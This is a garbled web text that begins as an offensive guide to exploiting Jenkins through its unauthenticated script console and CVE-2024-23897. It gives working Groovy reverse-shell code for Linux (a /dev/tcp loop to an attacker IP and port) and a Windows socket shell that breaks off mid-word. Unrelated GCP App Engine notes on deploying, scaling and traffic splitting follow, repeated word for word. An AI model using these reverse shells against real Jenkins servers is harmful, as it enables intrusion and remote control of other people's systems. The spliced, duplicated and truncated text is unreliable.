Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
GCP App Engine consist of services, versions, and instances. Services usually provide a single function. Versions means different versions of code running in the App Engine environment. Instances are managed instances running the specific service.
How to Deploy?
Deploy App Engine using gcloud app deploy command. Also includes configuring the App Engine environment using the app.yaml file. Keep in mind that a project can have only one App Engine app at a time.
How to Scale?
There are three scaling options. auto-scaling, basic scaling, and manual scaling. Only auto-scaling and basic scaling are dynamic. Manual scaling creates resident instances. Auto-scaling allows for more configuration options than basic scaling.
How to Split the traffic?
This can be done using gcloud app services set-traffic command. Use ––splits parameter, to specify the percent of traffic to route to each version.
How to Migrate the traffic?
This can be achieved from the Versions page of the App Engine console or using the ––migrate parameter with the gcloud app services set-traffic command.
How to Deploy?
Deploy App Engine using gcloud app deploy command. Also includes configuring the App Engine environment using the app.yaml file. Keep in mind that a project can have only one App Engine app at a time.
How to Scale?
There are three scaling options. auto-scaling, basic scaling, and manual scaling. Only auto-scaling and basic scaling are dynamic. Manual scaling creates resident instances. Auto-scaling allows for more configuration options than basic scaling.
How to Split the traffic?
This can be done using gcloud app services set-traffic command. Use ––splits parameter, to specify the percent of traffic to route to each version.
How to Migrate the traffic?
This can be achieved from the Versions page of the App Engine console or using the ––migrate parameter with the gcloud app services set-traffic command.